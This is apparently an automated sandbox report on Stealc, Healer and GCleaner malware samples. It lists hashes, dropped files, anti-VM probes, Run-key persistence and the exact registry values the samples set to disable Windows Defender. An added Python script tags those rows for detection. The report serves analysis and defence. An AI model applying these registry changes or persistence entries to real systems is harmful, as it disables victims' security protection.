| SHA512 | bc6c779ba802a90733e3bf68910eeeb734d00bfe351b0e8c44b3fa2efa8b962b7dc5c8aca3c40ccfcec452e15451454f0f08460e01130c3f335cb71df8feb438 |
memory/2020-1163-0x0000000000AB0000-0x0000000000F67000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10062730121\am_no.cmd
| MD5 | 189e4eefd73896e80f64b8ef8f73fef0 |
| SHA1 | efab18a8e2a33593049775958b05b95b0bb7d8e4 |
| SHA256 | 598651a10ff90d816292fba6e1a55cf9fb7bb717f3569b45f22a760849d24396 |
| SHA512 | be0e6542d8d26284d738a33df3d574d9849d709d091d66588685a1ac30ed1ebef48a9cc9d8281d9aeebc70fed0ddae22750cd253ec6b89e78933de08b0a09b74 |
memory/2900-1179-0x0000000000400000-0x000000000055C000-memory.dmp
memory/2984-1178-0x0000000004090000-0x00000000041EC000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9LCUCRNJ1FDOQWNY3QJH.temp
| MD5 | c823aa2da1cfcba20afde34bd4f677de |
| SHA1 | 952cfe354bb1a331e93b0b96df344d9f1070f27c |
| SHA256 | ef2f68bf88d811bb6867ca4f8f9887c8776a33ed8870a8ab2b1ad6380910566c |
| SHA512 | 4fa9abd49180adbaea0697d3859fcf0b54de471ca92df09ae3ea31b64e17b2841cf3d89f39e494a165145ae39c710baebca5ca5e1f5d3af63ef02c4902dee152 |
C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe
| MD5 | 98d249e93dc8a0a37b9225c1f9a42abd |
| SHA1 | 695d7b5ef9ff0c135d5bc2522c5805c00020c82b |
| SHA256 | 5bc0bf81cd564d205ca4243e2111eb1ab116ba68ae65deea98cf3a2a52deaa8f |
| SHA512 | a1d5c86a0fe43bf0f9d3490c406b04eeae2259bf6f8a76a85819ee7364da5f42d775a36d06a6c2c518e33e8dfa4e90f3cfeb912e1a1023c23445aedb10935804 |
memory/2280-1323-0x0000000000400000-0x0000000000856000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10062890101\d5e3ec016c.exe
| MD5 | 60dd2030e1ff1f9a3406ddc438893694 |
| SHA1 | b01f2c39b1046bc892c9db78898e1c063b21836f |
| SHA256 | d77580f219e5b86e38e34d2125862a58d03a76ac1b6dbb40bc4f65b114bbb4ee |
| SHA512 | 15f9aad02632481934b3f271debf73d5cf61bdd824d0f4a47e38b391186f7de16ba5f1d51f391625b945ff14b55d90cd31799b1483837aea732a45effef94246 |
memory/2596-1353-0x0000000000990000-0x00000000009EC000-memory.dmp
C:\ProgramData\00z58\p8q1n7
| MD5 | a1b220c367ca490d68aebe65c3bca3bf |
| SHA1 | 2ebbca56387ab4ad6261dc4bd2644847a665856a |
| SHA256 | 09bfda600d23d0fd3a6f6b1eb548d03117bb0e4bf9a8f69864bf31a9321630d8 |
| SHA512 | 331d21196bce1b1151850dd5270e6c2b43414e32cc35257b92697b9b513789728f638630581f419c54851e0273f567c9684b30fb2948b472acdb76ef2f0fa59d |
C:\ProgramData\00z58\v37ycb
| MD5 | 90a1d4b55edf36fa8b4cc6974ed7d4c4 |
| SHA1 | aba1b8d0e05421e7df5982899f626211c3c4b5c1 |
| SHA256 | 7cf3e9e8619904e72ea6608cc43e9b6c9f8aa2af02476f60c2b3daf33075981c |
| SHA512 | ea0838be754e1258c230111900c5937d2b0788f90bbf7c5f82b2ceda7868e50afb86c301f313267eaa912778da45755560b5434885521bf915967a7863922ae2 |
C:\Users\Admin\AppData\Local\Temp\10062900101\aa27374f64.exe
| MD5 | ebcd88613fed4a2608bc1768817bce4d |
| SHA1 | afbba964372b91250c4c04ec9ee649a36a50b95f |
| SHA256 | 124e9553ae88df251e56e6dade1476fec8ef86fd579d978ca3b0d66ca3506a3e |
| SHA512 | 45f0bdf0c0c5d63662723110985b5dd7c295f70f79d55080dada64fa8480f074f6c7276f2a8acf712fd5793eabe3be77e2c72470ad282707eface715f1cbd113 |
memory/2984-1451-0x0000000004240000-0x00000000046F7000-memory.dmp
C:\ProgramData\00z58\yct0hv
| MD5 | 6d9ead954a1d55a4b7b9a23d96bb545e |
| SHA1 | b55a31428681654b9bc4f428fc4c07fa7244760f |
| SHA256 | eab705a4e697fa8c54cdbe7df8d46c679df9878c327a003819bb2bf72d90919c |
| SHA512 | b9422f770aa156c13f63399aae96d750f273a6db7c9177b725660aa236a04ca7c4e3bf64d394de3a1f1ec2ad49b60528023aee37b7c195ed70073c049980a322 |
memory/764-1457-0x0000000001150000-0x0000000001607000-memory.dmp
memory/2984-1453-0x0000000004240000-0x00000000046F7000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
| MD5 | 9b1c99d5245940563e9e81e95c4832ec |
| SHA1 | 1bc5970a797d7160879f1ab93559a23b736a2ce7 |
| SHA256 | 5e5e2d6ab15529a13c5f6fddf4908f82199df64cd0fff65ec624e324f6f20a45 |
| SHA512 | 6d270d67927d391ddb39f5f2c3bbcbe36add45dc5cbf35099b0876b1b1c91f7ff23389e564bdf583fb4245984cd0a8af8f75ef87695296a8dc1d91269763b957 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000009.dbtmp
| MD5 | 979c29c2917bed63ccf520ece1d18cda |
| SHA1 | 65cd81cdce0be04c74222b54d0881d3fdfe4736c |
| SHA256 | b3524365a633ee6d1fa9953638d2867946c515218c497a5ec2dbef7dc44a7c53 |
| SHA512 | e38f694fd6ab9f678ae156528230d7a8bfb7b59a13b227f59f9c38ab5617db11ebb6be1276323a905d09c4066a3fe820cf58077ab48bf201f3c467a98516ee7a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000010.dbtmp
| MD5 | 60e3f691077715586b918375dd23c6b0 |
| SHA1 | 476d3eab15649c40c6aebfb6ac2366db50283d1b |
| SHA256 | e91d13722e31f9b06c5df3582cad1ea5b73547ce3dc08b12ed461f095aad48ee |
| SHA512 | d1c146d27bbf19362d6571e2865bb472ce4fe43dc535305615d92d6a2366f98533747a8a70a578d1f00199f716a61ce39fac5cab9dd67e9c044bc49e7343130e |
memory/2280-1516-0x0000000000400000-0x0000000000856000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2025-03-02 02:18
Reported
2025-03-02 02:21
Platform
win10v2004-20250217-en
Max time kernel
149s
Max time network
144s
Command Line
Signatures
Detects Healer an antivirus disabler dropper
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
GCleaner
Gcleaner family
Healer
Healer family
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe | N/A |
Modifies Windows Defender TamperProtection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe | N/A |
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications | C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe | N/A |
Stealc
Stealc family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10062950101\f33a39d263.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10062920101\2157e39777.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10062930101\13866c738c.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| N/A | N/A | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10062920101\2157e39777.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10062930101\13866c738c.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10062930101\13866c738c.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10062950101\f33a39d263.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10062920101\2157e39777.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10062950101\f33a39d263.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10062930101\13866c738c.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10062950101\f33a39d263.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10062920101\2157e39777.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SavingsSync\OneDriveSavingService.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SavingsSync\OneDriveSavingService.exe | N/A |
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a16b636c8b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10062720101\\a16b636c8b.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10062730121\\am_no.cmd" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\26d8edfd34.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10062940101\\26d8edfd34.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f33a39d263.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10062950101\\f33a39d263.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5d8a752ab6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10062960101\\5d8a752ab6.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\108a92f678.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10062970101\\108a92f678.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
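The Defender policy writes, the VirtualBox/BIOS/Wine probes and the Run-key entries in the tables above are exactly the rows a triage script should tag without a human reading them one by one. The Python below is an added example, not part of this report or of any sandbox vendor's tooling: it re-parses a handful of rows copied from the tables above into per-process findings. The rule names, the benign firefox.exe control row and the matching suffixes are my own choices.

```python
"""Classify sandbox registry rows into Defender-tamper, anti-VM and
persistence findings. Added example; rule names are mine, not the report's."""
import re
from collections import defaultdict

# Constructed sample: (operation, indicator, process) rows copied from the
# report's tables above, plus one benign firefox.exe row as a control.
SAMPLE_EVENTS = [
    ("Set value (int)",
     r'\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"',
     r'C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe'),
    ("Set value (int)",
     r'\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"',
     r'C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe'),
    ("Set value (int)",
     r'\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"',
     r'C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe'),
    ("Set value (int)",
     r'\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"',
     r'C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe'),
    ("Key opened",
     r'\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__',
     r'C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe'),
    ("Key value queried",
     r'\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion',
     r'C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe'),
    ("Key opened",
     r'\REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine',
     r'C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe'),
    ("Set value (str)",
     r'\REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\26d8edfd34.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10062940101\\26d8edfd34.exe"',
     r'C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe'),
    # Benign control: a browser creating its own Classes key must not match.
    ("Key created",
     r'\REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000_Classes\Local Settings',
     r'C:\Program Files\Mozilla Firefox\firefox.exe'),
]

# Indicator rows look like 'path' or 'path = "value"'.
INDICATOR_RE = re.compile(r'^(?P<path>.+?)(?: = "(?P<value>.*)")?$')

# Lower-cased path fragments the rules key on (hypothetical rule set).
DEFENDER_POLICY = "\\policies\\microsoft\\windows defender\\"
DEFENDER_NOTIFY = "\\windows defender security center\\notifications\\disablenotifications"
TAMPER_PROTECTION = "\\microsoft\\windows defender\\features\\tamperprotection"
RUN_KEY = "\\microsoft\\windows\\currentversion\\run\\"
ANTI_VM_PROBES = {
    "\\hardware\\acpi\\dsdt\\vbox__": "virtualbox_acpi",
    "\\software\\wine": "wine",
    "\\hardware\\description\\system\\systembiosversion": "bios_version",
    "\\hardware\\description\\system\\videobiosversion": "bios_version",
}


def parse_indicator(indicator):
    """Split 'path = "value"' into (path, value); value is None for key ops."""
    m = INDICATOR_RE.match(indicator)
    return m.group("path"), m.group("value")


def classify(op, indicator):
    """Return the rule tags a single report row triggers."""
    path, value = parse_indicator(indicator)
    p = path.lower()
    leaf = p.rsplit("\\", 1)[-1]
    tags = []
    if op.startswith("Set value"):
        # Any Disable* policy value under the Windows Defender policy key set to 1.
        if DEFENDER_POLICY in p and leaf.startswith("disable") and value == "1":
            tags.append("defender_tamper:policy_disable")
        if p.endswith(TAMPER_PROTECTION) and value == "0":
            tags.append("defender_tamper:tamper_protection_off")
        if p.endswith(DEFENDER_NOTIFY) and value == "1":
            tags.append("defender_tamper:notifications_off")
        if RUN_KEY in p:
            tags.append("persistence:run_key")
    for suffix, probe in ANTI_VM_PROBES.items():
        if p.endswith(suffix):
            tags.append("anti_vm:" + probe)
    return tags


def summarize(events):
    """Map each process to the sorted set of tags it triggered; processes
    that triggered nothing are omitted."""
    per_proc = defaultdict(set)
    for op, indicator, process in events:
        per_proc[process].update(classify(op, indicator))
    return {proc: sorted(tags) for proc, tags in per_proc.items() if tags}


if __name__ == "__main__":
    for proc, tags in summarize(SAMPLE_EVENTS).items():
        print(proc, "->", ", ".join(tags))
```

Two caveats when reading these rows on a real host rather than in the sandbox: the WOW6432Node prefix shows the writes came through the 32-bit registry view, so confirm the native HKLM\SOFTWARE\Policies\Microsoft\Windows Defender and Windows Defender\Features keys before concluding the engine was actually disabled; and Tamper Protection, when it is on, blocks exactly these value changes from unsigned processes, so a logged Set value does not by itself prove the write took effect.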
Checks installed software on the system
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\ntlogsystem.bin | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SavingsSync\OneDriveSavingService.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10062920101\2157e39777.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10062930101\13866c738c.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10062950101\f33a39d263.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1996 set thread context of 2952 | N/A | C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe | C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe |
| PID 3656 set thread context of 324 | N/A | C:\Users\Admin\AppData\Local\Temp\10062920101\2157e39777.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 1988 set thread context of 2016 | N/A | C:\Users\Admin\AppData\Local\Temp\10062930101\13866c738c.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10062720101\a16b636c8b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
